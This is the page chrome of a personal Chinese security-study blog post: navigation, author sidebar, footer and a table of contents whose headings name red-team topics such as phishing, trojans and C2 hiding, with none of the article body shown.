  <a href="/2023/07/04/SAFE/12%20%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;HOxhia4r5eJ6KPA.jpg" title="未命名">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>未命名</h3>
  </a>

    </div>
    <div class="item right">
    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#131-vpc%E9%A1%B9%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text"> 13.1 vpc 项目</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1311-vpc1"><span class="toc-number">1.1.</span> <span class="toc-text"> 13.1.1 vpc1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1312-vpc2"><span class="toc-number">1.2.</span> <span class="toc-text"> 13.1.2 vpc2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1313-vpc3"><span class="toc-number">1.3.</span> <span class="toc-text"> 13.1.3 vpc3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1314-vpc4"><span class="toc-number">1.4.</span> <span class="toc-text"> 13.1.4 vpc4</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E9%9D%B6%E6%9C%BA-1-web"><span class="toc-number">1.4.0.1.</span> <span class="toc-text"> （ 1 ）靶机 1 ：WEB</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#132-%E7%BA%A2%E9%98%9Fapt"><span class="toc-number">2.</span> <span class="toc-text"> 13.2 红队 APT</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1321-%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC"><span class="toc-number">2.1.</span> <span class="toc-text"> 13.2.1 邮件钓鱼</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1322-%E5%AE%8F%E7%97%85%E6%AF%92-lnk%E6%9C%A8%E9%A9%AC"><span class="toc-number">2.2.</span> <span class="toc-text"> 13.2.2 宏病毒 LNK 木马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1323-office-cve%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.3.</span> <span class="toc-text"> 13.2.3 office CVE 漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1334-%E9%92%93%E9%B1%BC%E4%BC%AA%E8%A3%85"><span class="toc-number">2.4.</span> <span class="toc-text"> 13.3.4 钓鱼伪装</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80-%E9%92%93%E9%B1%BC%E4%BC%AA%E8%A3%85-rlo"><span class="toc-number">2.4.0.1.</span> <span class="toc-text"> （ 1 ）文件后缀 - 钓鱼伪装 - RLO</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-335-msfcs%E7%89%B9%E5%BE%81%E4%BF%AE%E6%94%B9"><span class="toc-number">2.5.</span> <span class="toc-text"> 1 3.3.5 msf&#x2F;cs 特征修改</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-nc-%E6%9C%AA%E5%8A%A0%E5%AF%86%E5%8A%A0%E5%AF%86%E5%90%8E-%E6%B5%81%E9%87%8F%E6%8A%93%E5%8C%85%E5%AF%B9%E6%AF%94"><span class="toc-number">2.5.0.1.</span> <span class="toc-text"> （ 1 ）NC - 未加密 &amp; 加密后 - 流量抓包对比</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1336-c2%E6%9C%8D%E5%8A%A1%E5%99%A8%E9%9A%90%E8%97%8F"><span class="toc-number">2.6.</span> <span class="toc-text"> 13.3.6 c2 服务器隐藏</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%98%B2%E5%B0%81%E9%94%81%E5%A4%84%E7%BD%AEip%E5%9C%B0%E5%9D%80%E5%9F%9F%E5%89%8D%E7%BD%AE-cdn-%E4%BA%91%E5%87%BD%E6%95%B0%E7%BD%91%E7%9B%98%E7%AC%AC%E4%B8%89%E6%96%B9%E4%B8%8A%E7%BA%BF%E7%AD%89"><span class="toc-number">2.6.0.1.</span> <span class="toc-text"> 防封锁处置 IP 地址：域前置、CDN、云函数，网盘第三方上线等</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-%E4%BA%91%E5%87%BD%E6%95%B0-%E8%85%BE%E8%AE%AF%E4%BA%91%E6%93%8D%E4%BD%9C"><span class="toc-number">2.6.0.2.</span> <span class="toc-text"> （ 4 ）云函数 - 腾讯云操作</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E4%BA%91%E5%87%BD%E6%95%B0%E8%85%BE%E8%AE%AF%E4%BA%91-%E4%BA%91%E4%BA%A7%E5%93%81-%E4%BA%91%E5%87%BD%E6%95%B0-%E5%87%BD%E6%95%B0%E6%9C%8D%E5%8A%A1-%E6%96%B0%E5%BB%BA"><span class="toc-number">2.6.0.3.</span> <span class="toc-text"> 创建云函数：腾讯云 - 云产品 - 云函数 - 函数服务 - 新建</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%87%BD%E6%95%B0%E6%9C%8D%E5%8A%A1%E9%80%89%E6%8B%A9%E4%BB%8E%E5%A4%B4%E5%BC%80%E5%A7%8B-%E5%87%BD%E6%95%B0%E7%B1%BB%E5%9E%8B%E9%80%89%E6%8B%A9%E4%BA%8B%E4%BB%B6%E5%87%BD%E6%95%B0-%E5%87%BD%E6%95%B0%E5%90%8D%E7%A7%B0%E4%BB%BB%E6%84%8F-%E8%BF%90%E8%A1%8C"><span class="toc-number">2.6.0.4.</span> <span class="toc-text"> 创建函数服务：选择从头开始 - 函数类型选择事件函数 - 函数名称任意 - 运行</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#-coding-utf8-"><span class="toc-number"></span> <span class="toc-text"> -- coding: utf8 --</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link"><span class="toc-number">0.0.0.1.</span> <span class="toc-text"> }</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#133-python%E8%87%AA%E5%8A%A8%E5%8C%96"><span class="toc-number">1.</span> <span class="toc-text"> 13.3 python 自动化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1331-socket%E5%85%8D%E6%9D%80%E5%90%8E%E9%97%A8"><span class="toc-number">1.1.</span> <span class="toc-text"> 13.3.1 socket 免杀后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1332%E5%A4%9A%E7%BA%BF%E7%A8%8B%E5%85%A8%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.2.</span> <span class="toc-text"> 13.3.2 多线程全端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1333-scapy%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">1.3.</span> <span class="toc-text"> 13.3.3 scapy 流量分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1334-%E6%96%87%E4%BB%B6%E8%A1%8C%E4%B8%BA%E7%9B%91%E6%8E%A7"><span class="toc-number">1.4.</span> <span class="toc-text"> 13.3.4 文件行为监控</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#134-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94"><span class="toc-number">2.</span> <span class="toc-text"> 13.4 应急响应</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD_"><span class="toc-number">2.1.</span> <span class="toc-text"> 未完待续_</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt=".N1h1l157"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">.N1h1l157</p>
  <div class="description" itemprop="description">人生如逆旅，我亦是行人</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">166</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">5</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">40</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL04xaDFsMTU3" title="https:&#x2F;&#x2F;github.com&#x2F;N1h1l157"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS9YVDcyNzgwMzA4" title="https:&#x2F;&#x2F;twitter.com&#x2F;XT72780308"><i class="ic i-twitter"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly9tLndlaWJvLmNuL3Byb2ZpbGUvNTgyOTg0MzUyNQ==" title="https:&#x2F;&#x2F;m.weibo.cn&#x2F;profile&#x2F;5829843525"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly90Lm1lL24xaDFsMTU3" title="https:&#x2F;&#x2F;t.me&#x2F;n1h1l157"><i class="ic i-address-card"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjEyMjgwNTc4NjlAcXEuY29t" title="mailto:1228057869@qq.com"><i class="ic i-envelope"></i></span>
      <span class="exturl item facebook" data-url="aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3Byb2ZpbGUucGhwP2lkPTEwMDA4NDUzNzQwNTEzNw==" title="https:&#x2F;&#x2F;www.facebook.com&#x2F;profile.php?id&#x3D;100084537405137"><i class="ic i-facebook"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>友链</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-clipboard"></i>书架</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/books/LITERATURE/" rel="section"><i class="ic i-fedora"></i>LITERATURE</a>
  </li>

        
  <li class="item">
    <a href="/books/VULNHUB/" rel="section"><i class="ic i-android"></i>X_T-VULNHUB</a>
  </li>

        
  <li class="item">
    <a href="/books/XIAODI/" rel="section"><i class="ic i-opera"></i>XIAODI-SAFE</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E6%96%87%E5%AD%A6/" title="分类于 文学">文学</a>
</div>

    <span><a href="/2023/06/30/BOOK/23%E3%80%8A%E7%8E%B0%E5%AE%9E%E4%B8%80%E7%A7%8D%E3%80%8B%E4%BD%99%E5%8D%8E/" title="《现实一种》余华">《现实一种》余华</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/07/04/SAFE/6%20%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0%E5%8F%8A%E5%88%A9%E7%94%A8/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/MBTI/" title="分类于 MBTI">MBTI</a>
</div>

    <span><a href="/2023/04/01/MBTI/ESFP%E8%A7%A3%E8%AF%BB/" title="ESFP解读">ESFP解读</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/07/04/SAFE/5%20APP%E6%94%BB%E9%98%B2/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E6%96%87%E5%AD%A6/" title="分类于 文学">文学</a>
</div>

    <span><a href="/2023/06/30/BOOK/49%E3%80%8A%E6%B2%89%E9%BB%98%E7%9A%84%E7%BE%94%E7%BE%8A%E3%80%8B%E5%86%AF%E7%8E%9B%E5%A3%AB%C2%B7%E5%93%88%E9%87%8C%E6%96%AF/" title="《沉默的羔羊》冯玛士·哈里斯">《沉默的羔羊》冯玛士·哈里斯</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%B8%96%E7%95%8C%E5%90%8D%E8%91%97/" title="分类于 世界名著">世界名著</a>
</div>

    <span><a href="/2023/06/30/BOOK/47%E3%80%8A%E4%BA%BA%E7%94%9F%E7%9A%84%E4%BB%B7%E5%80%BC%E4%B8%8E%E6%84%8F%E4%B9%89%E3%80%8B%E5%A5%A5%E4%BC%8A%E8%82%AF/" title="《人生的价值与意义》奥伊肯">《人生的价值与意义》奥伊肯</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E6%96%87%E5%AD%A6/" title="分类于 文学">文学</a>
</div>

    <span><a href="/2023/06/30/BOOK/60%E3%80%8A%E9%87%91%E9%A9%B4%E8%AE%B0%E3%80%8B%E9%98%BF%E6%99%AE%E5%88%97%E4%B9%8C%E6%96%AF/" title="《金驴记》阿普列乌斯">《金驴记》阿普列乌斯</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/MBTI/" title="分类于 MBTI">MBTI</a>
</div>

    <span><a href="/2023/04/01/MBTI/INTJ%E8%A7%A3%E8%AF%BB/" title="INTJ解读">INTJ解读</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/MBTI/" title="分类于 MBTI">MBTI</a>
</div>

    <span><a href="/2023/04/01/MBTI/%E8%87%AA%E6%88%91%E4%B8%8E%E5%8A%A8%E6%9C%BA/" title="自我与动机">自我与动机</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/VULNHUB/" title="分类于 VULNHUB">VULNHUB</a>
</div>

    <span><a href="/2023/07/01/VULNHUB/101%20EVM/" title="VULNHUB 1 EVM">VULNHUB 1 EVM</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">.N1h1l157 @ Phut Hon</span>
  </div>

<!--   自定义开启一个网站的运行时间 -->
  <div class="site-uptime">
    Site uptime: <span id="site-uptime"></span>
  </div>
  <script>
    var siteUptimeElement = document.getElementById('site-uptime');
    var siteSetupDate = new Date('2023-03-18'); // 替换为您的网站具体创建日期，格式为 'YYYY-MM-DD'
    setInterval(function() {
      var currentTime = new Date();
      var uptime = formatUptime(currentTime - siteSetupDate);
      siteUptimeElement.textContent = uptime;
    }, 1000);

    function formatUptime(milliseconds) {
      var seconds = Math.floor(milliseconds / 1000);
      var minutes = Math.floor(seconds / 60);
      var hours = Math.floor(minutes / 60);
      var days = Math.floor(hours / 24);

      var uptime = '';
      if (days > 0) {
        uptime += days + '天 ';
      }
      if (hours > 0) {
        uptime += (hours % 24) + '时 ';
      }
      if (minutes > 0) {
        uptime += (minutes % 60) + '分 ';
      }
      uptime += (seconds % 60) + '秒';

      return uptime;
    }
  </script>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/07/04/SAFE/13 补充知识/',
    favicon: {
      show: "Cryp71c3",
      hide: "十年磨一剑"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
